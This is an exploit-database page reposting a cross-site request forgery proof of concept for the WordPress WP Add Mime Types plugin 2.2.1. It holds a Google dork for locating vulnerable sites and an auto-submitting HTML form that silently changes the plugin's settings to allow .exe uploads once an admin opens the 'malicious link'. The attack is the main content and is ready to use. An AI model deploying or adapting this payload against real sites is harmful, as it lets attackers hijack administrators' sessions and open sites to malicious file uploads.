Advertisement






WordPress Add Mime Types Plugin 2.2.1 Cross-Site Request Forgery

CVE Category Price Severity
CVE-2020-16894 CWE-352 $500 High
Author Risk Exploitation Type Date
Jinson Varghese Behanan High Remote 2019-08-20
CVSS EPSS EPSSP
CVSS: 3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.73239 0.91389

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080079

Below is a copy:

WordPress Add Mime Types Plugin 2.2.1 Cross-Site Request Forgery
# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
# Google Dork: inurl:/wp-content/plugins/wp-add-mime-types
# Date: 18 july, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
# Version: 2.2.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : Fresh

#About Plugin
The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
#Vulnerable Description
WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
## CSRF Code
Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe    =    application/x-msdownload">
<input type="submit">
</form>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum